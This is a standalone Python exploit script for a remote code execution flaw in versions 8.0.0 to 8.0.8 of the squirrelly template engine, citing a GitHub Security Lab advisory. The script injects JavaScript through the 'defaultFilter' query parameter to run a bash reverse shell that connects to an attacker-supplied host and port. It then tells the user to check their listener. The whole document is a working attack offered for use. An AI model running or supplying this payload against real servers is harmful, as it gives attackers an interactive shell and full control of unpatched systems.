#!/bin/python3
# Source: https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
# Analysis: https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
# squirrelly v8.0.0 >= v8.0.8 Remote Code Execution
# Environment : Ubuntu 20.04.1

import requests
from sys import argv

if __name__ == '__main__':
	url = argv[1]
	lhost = argv[2]
	lport = argv[3]
	command = f'/bin/bash -c "/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
	code = "e'));"
	code += f"let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('{command}');"
	code += '//'
	payload = {
		'defaultFilter': code
	}
	try:
		requests.get(url, params = payload, verify = False, timeout = 1)
	except requests.exceptions.ReadTimeout:
		print('[+] Payload sent. check your listener please')